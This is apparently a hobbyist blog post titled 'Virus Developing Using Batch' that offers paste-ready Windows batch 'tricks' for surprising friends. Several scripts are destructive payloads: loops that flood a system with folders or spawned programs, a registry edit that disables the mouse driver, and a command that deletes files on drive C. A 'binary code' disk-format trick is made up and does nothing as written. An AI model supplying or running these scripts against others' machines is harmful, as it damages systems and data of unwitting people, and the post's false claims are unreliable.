300x250 AD TOP

Virus Developing Using Batch

Hellow everyone.....! my name is Akil and Today i am going to share Awsome interesting Batch programming (cmd) Tricks which you can learn and surprise your friends.

How to create more than 10,000 folders under a minute


1. Open notepad
2. Paste the below given code in Notepad

@echo off
:top
md %random%
goto top

3. Save it as Name.bat
(name can be anything but .Bat is must)


Open Notepad continuously



1. Open notepad
2. Paste the below given code in Notepad

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

3. Save it as Name.bat



Make A Select Program



1. Open notepad
2. Paste the below given code in Notepad

@echo off
title Select Program
:start
cls
echo options
echo 1. Calculator
echo 2. word
echo 3. cmd
echo 4. Notepad
echo 5. Lock PC
echo 6. Log Off
echo 7. Exit
set /p var=What Would you like to open? (The Selection no)
IF '%var%' == '1' GOTO calc
IF '%var%' == '2' GOTO Word
IF '%var%' == '3' GOTO cmd
IF '%var%' == '4' GOTO Note
IF '%var%' == '5' GOTO SU
IF '%var%' == '6' GOTO LO
IF '%var%' == '7' GOTO exit
cls
msg * That selection does not exist please try again!
goto start
:calc
"C:\windows\system32\calc.exe"
Pause
cls
goto start
:Word
cd "C:\Program Files\Microsoft Office\OFFICE11\"
start WINWORD.EXE
goto start
PAUSE
cls
:cmd
start cmd
goto start
PAUSE
cls
:Note
start %SystemRoot%\system32\notepad.exe
goto start
PAUSE
cls
:SU
start %windir%\System32\rundll32.exe user32.dll,LockWorkStation
exit
:LO
set /p LOC=msg Are you sure yo want to logg off? (Y/N)
IF '%LOC%' == 'Y' GOTO LOC
IF '%LOC%' == 'N' GOTO LONC
pause
goto start
:LOC
start %windir%\System32\shutdown /l
exit
:LONC
msg * Log of Aborted!
goto start

3. Save it as Name.bat



Create Matrix Raining Code Screen



1. Open notepad
2. Paste the below given code in Notepad

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random%
%random%
goto start

3. Save it as Name.bat



How to do? your computer slow.....!!!



1. Open notepad
2. Paste the below given code in Notepad

:A
start http://7cybercity.blogspot.in
goto A

3. Save it as Name.bat



Disabling the mouse by creating a virus

Harmful (most Dengerous trick)
I recommend you to use this one carefully.


1. Open notepad
2. Paste the below given code in Notepad

rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\s
ystem\CurrentControlSet\Services\
Mouclass"
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4

3. Save it as Name.bat



Format c drive by creating a virus:

This is Harmful (most Dengerous trick)
This is too harmful so think before you do it.


1. Open notepad
2. Paste the below given code in Notepad

@ECHO OFF 
DEL C:\ *.*|Y

3. Save it as Name.bat



Delete Auto run file from Drive - Usb



1. Open notepad
2. Paste the below given code in Notepad

@echo off
echo
ECHO ENTER THE USB\DRIVE LETTER TO REMOVE AUTORUN
echo
SET /P X=
attrib -h -r -s %X%:\autorun.inf
DEL %X%:\autorun.inf
pause

3. Save it as Name.bat



Format hard disk using binary code

This is too harmful so think before you do it.
please don’t try this on your own computer or else you will end up formatting your own computer.



1. Open notepad
2. Paste the below given code in Notepad

01001011000111110010010101010101010000011111100000

3. Save it as Name.bat


Open Number of sites on single click



1. Open notepad
2. Paste the below given code in Notepad

@echo off
start "searching" "http://google.com/"
start "Learn Hacking" "http://7cybercity.blogspot.in"
start "Facebook" "http://facebook.com/"

3. Save it as Name.bat



How To Make CMD And Calculator continuously




1. Open notepad
2. Paste the below given code in Notepad

@echo off
:E
start cmd.exe
start calc.exe
goto :E

3. Save it as Name.bat



1 comments:

cyberhack000@gmail.comwhatsapp No. Mo.9898766992
Designed and Developed By | Akil CyberZone